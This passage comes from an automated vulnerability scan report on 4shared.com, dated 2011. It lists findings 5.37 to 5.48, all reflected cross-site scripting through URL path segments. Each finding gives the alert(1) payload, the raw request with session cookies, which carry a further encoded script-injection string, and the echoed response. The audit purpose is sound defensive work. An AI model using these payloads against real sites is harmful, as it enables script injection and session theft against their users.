var url="/abuse.jsp?aLink=http://www.4shared.com/js/signup-script.jsp8cd94"-alert(1)-"07633452741";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.37. http://www.4shared.com/loginBox.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /loginBox.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15fe3"-alert(1)-"13719462e8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /loginBox.jsp15fe3"-alert(1)-"13719462e8f HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /loginBox.jsp15fe3&quot;-alert(1)-&quot;13719462e8f
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=92FE70F5A3203E5B91958B63EB8FC1BD.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:04 GMT
Connection: close
Content-Length: 36123


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/loginBox.jsp15fe3"-alert(1)-"13719462e8f";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.38. http://www.4shared.com/m/android.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /m/android.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9395b"-alert(1)-"96bc668bd2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /m9395b"-alert(1)-"96bc668bd2/android.jsp HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /m9395b&quot;-alert(1)-&quot;96bc668bd2/android.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6BC1AAE839A91BD67907F851E8D3402D.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:38 GMT
Connection: close
Content-Length: 36123


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/m9395b"-alert(1)-"96bc668bd2/android.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

5.39. http://www.4shared.com/m/android.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /m/android.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ed12"-alert(1)-"ff9a528e7d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /m/android.jsp4ed12"-alert(1)-"ff9a528e7d7 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /m/android.jsp4ed12&quot;-alert(1)-&quot;ff9a528e7d7
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7086C84FC8FF96049E03701F16AE0CAE.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:44 GMT
Connection: close
Content-Length: 36117


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/m/android.jsp4ed12"-alert(1)-"ff9a528e7d7";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.40. http://www.4shared.com/m/blackberry.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /m/blackberry.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c39b"-alert(1)-"ba8c575a95c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /m2c39b"-alert(1)-"ba8c575a95c/blackberry.jsp HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /m2c39b&quot;-alert(1)-&quot;ba8c575a95c/blackberry.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A4F0296C826302157650E9633BE16FD7.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:40 GMT
Connection: close
Content-Length: 36132


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/m2c39b"-alert(1)-"ba8c575a95c/blackberry.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
...[SNIP]...

5.41. http://www.4shared.com/m/blackberry.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /m/blackberry.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69a6b"-alert(1)-"80db2a41027 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /m/blackberry.jsp69a6b"-alert(1)-"80db2a41027 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /m/blackberry.jsp69a6b&quot;-alert(1)-&quot;80db2a41027
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=95403D84C0034F17BA2CB6B67773D206.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:45 GMT
Connection: close
Content-Length: 36132


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/m/blackberry.jsp69a6b"-alert(1)-"80db2a41027";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.42. http://www.4shared.com/m/symbian.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /m/symbian.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6ba5"-alert(1)-"f2530800432 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mf6ba5"-alert(1)-"f2530800432/symbian.jsp HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /mf6ba5&quot;-alert(1)-&quot;f2530800432/symbian.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=99D8FFB4975C056D9F3C05BF4AC05215.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:39 GMT
Connection: close
Content-Length: 36117


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/mf6ba5"-alert(1)-"f2530800432/symbian.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

5.43. http://www.4shared.com/m/symbian.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /m/symbian.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50ceb"-alert(1)-"9c67985142f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /m/symbian.jsp50ceb"-alert(1)-"9c67985142f HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /m/symbian.jsp50ceb&quot;-alert(1)-&quot;9c67985142f
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A6C24D0B2E2E5D66858D67429BC70026.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:44 GMT
Connection: close
Content-Length: 36128


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/m/symbian.jsp50ceb"-alert(1)-"9c67985142f";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.44. http://www.4shared.com/main/translate/setLang.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /main/translate/setLang.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39736"-alert(1)-"1ec01b6de0e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /main39736"-alert(1)-"1ec01b6de0e/translate/setLang.jsp HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /main39736&quot;-alert(1)-&quot;1ec01b6de0e/translate/setLang.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F73CC572AF956E9F72337A2529924ADE.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:04 GMT
Connection: close
Content-Length: 36193


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/main39736"-alert(1)-"1ec01b6de0e/translate/setLang.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedb
...[SNIP]...

5.45. http://www.4shared.com/main/translate/setLang.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /main/translate/setLang.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11c9c"-alert(1)-"b3e63033d79 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /main/translate11c9c"-alert(1)-"b3e63033d79/setLang.jsp HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /main/translate11c9c&quot;-alert(1)-&quot;b3e63033d79/setLang.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D6E0A71945AFFA927BE3920160757DB9.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:11 GMT
Connection: close
Content-Length: 36193


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/main/translate11c9c"-alert(1)-"b3e63033d79/setLang.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

5.46. http://www.4shared.com/main/translate/setLang.jsp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /main/translate/setLang.jsp

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77fc0"-alert(1)-"030cd898f55 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /main/translate/setLang.jsp77fc0"-alert(1)-"030cd898f55 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /main/translate/setLang.jsp77fc0&quot;-alert(1)-&quot;030cd898f55
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=87EA3869ED34688155236636B5D3476F.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:21 GMT
Connection: close
Content-Length: 36193


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/main/translate/setLang.jsp77fc0"-alert(1)-"030cd898f55";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.47. http://www.4shared.com/oauth/startFacebookLogin.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /oauth/startFacebookLogin.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17562"-alert(1)-"aa3f9a7695c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /oauth17562"-alert(1)-"aa3f9a7695c/startFacebookLogin.jsp HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /oauth17562&quot;-alert(1)-&quot;aa3f9a7695c/startFacebookLogin.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8154EA1F3F4FF79D5646E442478F4DB6.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:44 GMT
Connection: close
Content-Length: 36203


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/oauth17562"-alert(1)-"aa3f9a7695c/startFacebookLogin.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feed
...[SNIP]...

5.48. http://www.4shared.com/oauth/startFacebookLogin.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /oauth/startFacebookLogin.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4481d"-alert(1)-"c7de45f4dcb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /oauth/startFacebookLogin.jsp4481d"-alert(1)-"c7de45f4dcb HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
